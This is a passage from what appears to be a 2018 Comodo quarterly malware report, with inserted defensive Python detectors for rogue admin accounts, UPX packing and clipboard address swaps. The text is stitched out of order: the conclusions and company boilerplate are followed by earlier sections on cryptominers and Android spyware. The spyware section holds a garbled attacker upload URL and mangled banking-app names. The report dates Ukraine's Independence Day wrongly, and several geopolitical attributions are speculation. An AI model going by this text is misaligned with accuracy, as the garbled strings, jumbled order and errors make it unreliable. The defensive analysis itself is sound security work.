Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
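The Starter behaviour described above (a new local account that is promptly added to the administrators group) maps onto two Windows Security log events, 4720 and 4732. The correlation below is an added example, not Comodo's detection logic; the events, account names and SIDs are constructed, and the "Administrators" group name assumes an English-language Windows, so the well-known SID S-1-5-32-544 is matched as well.

```python
"""Correlate Windows Security log events to spot a Starter-style rogue admin account.

Added example, not Comodo's detection logic. Events are constructed dicts using the
field names of Security events 4720 (user account created) and 4732 (member added to a
security-enabled local group), as a SIEM or Get-WinEvent export would present them.
"""
from datetime import datetime, timedelta

ADMIN_GROUPS = {"Administrators", "S-1-5-32-544"}   # local Administrators: name and well-known SID
CREATE_TO_ADMIN_WINDOW = timedelta(minutes=10)      # assumption: how fast malware promotes its account

SAMPLE_EVENTS = [  # constructed sample data, not real log records
    {"EventID": 4720, "TimeCreated": "2018-06-02T03:14:05", "SubjectUserName": "SYSTEM",
     "TargetUserName": "svc_remote", "TargetSid": "S-1-5-21-1-2-3-1104"},
    {"EventID": 4732, "TimeCreated": "2018-06-02T03:14:07", "SubjectUserName": "SYSTEM",
     "MemberSid": "S-1-5-21-1-2-3-1104", "TargetUserName": "Administrators"},
    {"EventID": 4720, "TimeCreated": "2018-06-02T09:00:00", "SubjectUserName": "jdoe",
     "TargetUserName": "intern01", "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"EventID": 4732, "TimeCreated": "2018-06-02T09:00:02", "SubjectUserName": "jdoe",
     "MemberSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "Remote Desktop Users"},
    {"EventID": 4732, "TimeCreated": "2018-06-03T11:30:00", "SubjectUserName": "jdoe",
     "MemberSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "Administrators"},
]


def correlate(events, window=CREATE_TO_ADMIN_WINDOW):
    """Return findings in time order.

    'high'   : an account was created (4720) and added to Administrators (4732)
               within `window`, the Starter pattern.
    'medium' : any other addition to Administrators, left for an analyst to review.
    In 4732 the group is in TargetUserName and the new member in MemberSid.
    """
    created = {}       # member SID -> the 4720 event that created it
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):   # ISO timestamps sort lexically
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["EventID"] == 4732 and ev["TargetUserName"] in ADMIN_GROUPS:
            origin = created.get(ev["MemberSid"])
            if origin is not None:
                age = (datetime.fromisoformat(ev["TimeCreated"])
                       - datetime.fromisoformat(origin["TimeCreated"]))
                if age <= window:
                    findings.append({"severity": "high", "rule": "new_account_made_admin",
                                     "account": origin["TargetUserName"],
                                     "created_by": origin["SubjectUserName"],
                                     "promoted_by": ev["SubjectUserName"],
                                     "seconds": int(age.total_seconds())})
                    continue
            findings.append({"severity": "medium", "rule": "admin_group_add",
                             "member_sid": ev["MemberSid"], "by": ev["SubjectUserName"],
                             "at": ev["TimeCreated"]})
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```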


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, whose decompressor is just a few hundred bytes of code in length.
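Because a modified UPX build can rename the "UPX0"/"UPX1" sections that signature-based tools look for, packer triage should not rely on section names alone. The script below is an added example, not Comodo's tooling: it parses the PE section table with the Python standard library and flags both stock UPX section names and the telltale layout of a renamed build (an empty first section, the unpack destination, followed by a high-entropy one). The three PE images are constructed in memory and the 7.2 bits/byte entropy threshold is an assumption.

```python
"""Packer triage for a PE image: stock UPX section names plus per-section entropy.

Added example, not Comodo's tooling. The sample PE images below are constructed
in memory (no optional header, no real code) purely to exercise the parser.
"""
import hashlib
import math
import struct
from dataclasses import dataclass

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}   # what an unmodified UPX build writes
ENTROPY_THRESHOLD = 7.2                         # assumption, bits/byte; compressed data sits near 8.0


@dataclass
class Section:
    name: str
    raw_size: int
    raw_offset: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or single-valued data, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list[Section]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size                 # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                     # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)  # SizeOfRawData, PointerToRawData
        blob = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append(Section(name, raw_size, raw_ptr, shannon_entropy(blob)))
    return sections


def triage(pe: bytes) -> dict:
    """Flag stock UPX by section name; flag a renamed build by its shape:
    an empty first section (unpack destination) followed by a high-entropy one."""
    sections = parse_sections(pe)
    stock = bool({s.name for s in sections} & UPX_SECTION_NAMES)
    empty_first = bool(sections) and sections[0].raw_size == 0
    high = [s.name for s in sections if s.raw_size and s.entropy >= ENTROPY_THRESHOLD]
    return {
        "sections": [(s.name, s.raw_size, round(s.entropy, 2)) for s in sections],
        "stock_upx_names": stock,
        "high_entropy_sections": high,
        "likely_packed": stock or (empty_first and bool(high)),
    }


# --- constructed sample images (not real binaries) ---------------------------
def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler standing in for compressed code."""
    out, seed = bytearray(), b"constructed"
    while len(out) < n:
        seed = hashlib.sha256(seed).digest()
        out += seed
    return bytes(out[:n])


def build_sample(names: list[str], payloads: list[bytes]) -> bytes:
    """Minimal PE: DOS stub, PE signature, COFF header, section table, raw data."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, 0, 0x102)
    data_start = 64 + 4 + 20 + 40 * len(names)
    table, body = bytearray(), bytearray()
    for name, payload in zip(names, payloads):
        raw_ptr = data_start + len(body) if payload else 0
        table += name.encode().ljust(8, b"\0")
        table += struct.pack("<IIIIIIHHI", len(payload) or 0x1000, 0, len(payload),
                             raw_ptr, 0, 0, 0, 0, 0)
        body += payload
    return bytes(dos) + b"PE\0\0" + coff + bytes(table) + bytes(body)


STOCK_UPX = build_sample(["UPX0", "UPX1", ".rsrc"], [b"", pseudo_random(2048), b"\0" * 256])
RENAMED_UPX = build_sample([".text", ".data", ".rsrc"], [b"", pseudo_random(2048), b"\0" * 256])
UNPACKED = build_sample([".text", ".data"], [b"\x90" * 512 + b"\xc3", b"A" * 256])

if __name__ == "__main__":
    for label, img in (("stock UPX", STOCK_UPX), ("renamed UPX", RENAMED_UPX), ("unpacked", UNPACKED)):
        print(label, triage(img))
```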

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.

The next malware in our list prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember or to fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
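As an added illustration from the defender's side (not code from the report or from Comodo), the following Python recognises wallet-address-shaped clipboard contents and flags a write that silently replaces the address the user copied with a different one, using the two addresses quoted above. The clipboard events and their user_initiated flag are constructed for the example; on a real Windows host that attribution would come from the clipboard owner window, which this code does not query.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Legacy Bitcoin addresses are Base58, which excludes 0, O, I and l. The
# report's example pair (a "3..." P2SH address swapped for a "1..." P2PKH
# address) matches this pattern; other coin formats need their own.
BTC_ADDRESS_RE = re.compile(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}")
ETH_ADDRESS_RE = re.compile(r"0x[0-9a-fA-F]{40}")


def looks_like_wallet_address(text: str) -> bool:
    """True if the whole clipboard payload is a single wallet address."""
    text = text.strip()
    return bool(BTC_ADDRESS_RE.fullmatch(text) or ETH_ADDRESS_RE.fullmatch(text))


@dataclass
class ClipboardEvent:
    """One observed clipboard write (constructed for this example).

    user_initiated marks writes attributed to the user's foreground window;
    a hijacker overwriting the clipboard from the background carries False.
    """
    seconds: float
    content: str
    user_initiated: bool


def detect_clipboard_swaps(events: List[ClipboardEvent],
                           max_gap: float = 5.0) -> List[Tuple[str, str]]:
    """Return (original, replacement) pairs for suspicious address swaps.

    A swap is flagged when an address the user copied is overwritten by a
    different address within max_gap seconds by a write the user did not
    initiate. A user deliberately copying a second address is not flagged.
    """
    alerts: List[Tuple[str, str]] = []
    last_user_copy: Optional[ClipboardEvent] = None
    for ev in events:
        if ev.user_initiated:
            # Only remember user copies that are wallet addresses.
            last_user_copy = ev if looks_like_wallet_address(ev.content) else None
            continue
        if (last_user_copy is not None
                and looks_like_wallet_address(ev.content)
                and ev.content.strip() != last_user_copy.content.strip()
                and ev.seconds - last_user_copy.seconds <= max_gap):
            alerts.append((last_user_copy.content, ev.content))
            last_user_copy = None  # one alert per hijacked copy
    return alerts


def paste_guard(copied: str, about_to_paste: str) -> bool:
    """True when the value about to be pasted is the address the user copied.

    A wallet application can apply this as a last-line check at paste time,
    independent of whether the background monitor caught the overwrite.
    """
    return (looks_like_wallet_address(copied)
            and copied.strip() == about_to_paste.strip())


# Constructed scenario using the two addresses quoted in the report.
SAMPLE_EVENTS = [
    ClipboardEvent(0.0, "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs", True),   # user copies
    ClipboardEvent(0.2, "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm", False),  # hijacker overwrites
    ClipboardEvent(9.0, "meeting notes", True),                        # unrelated copy
    ClipboardEvent(9.5, "meeting notes", False),                       # benign re-set
]

if __name__ == "__main__":
    for original, replacement in detect_clipboard_swaps(SAMPLE_EVENTS):
        print(f"ALERT: wallet address {original} silently replaced by {replacement}")
```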


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks

Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, ID, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the “AES” algorithm and sends it to the attackers' server (httphttpcgalimcomadminhrpupuphpdo=upload).

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1: Dardesh Google Play Services Instant Apps

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.

4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named “Spymaster Pro” and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect browser data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.

In addition to the abilities of previous versions, it includes some additional tricks:

• Extracts photos, audio and video
• Records the screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

• Takes control of the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

• Extract the device information
• Delete SMS
• Set ringer mode
• Monitor incoming SMS messages
• Clear memory
• Check for the presence of the following banking applications: comwooribankpibsmart, comkbstarkbbank, comibkneobanking, comscdanbscbankapp, comshinhansbanking, comhanabankebkchannelandroidhananbank, nhsmart, comepostpsfsdsi, comkftckjbsmb, comsmgspbs
• Extract contact details
• Set Wi-Fi to always on

Version 2 can execute additional commands:

• Send SMS and read outgoing SMS
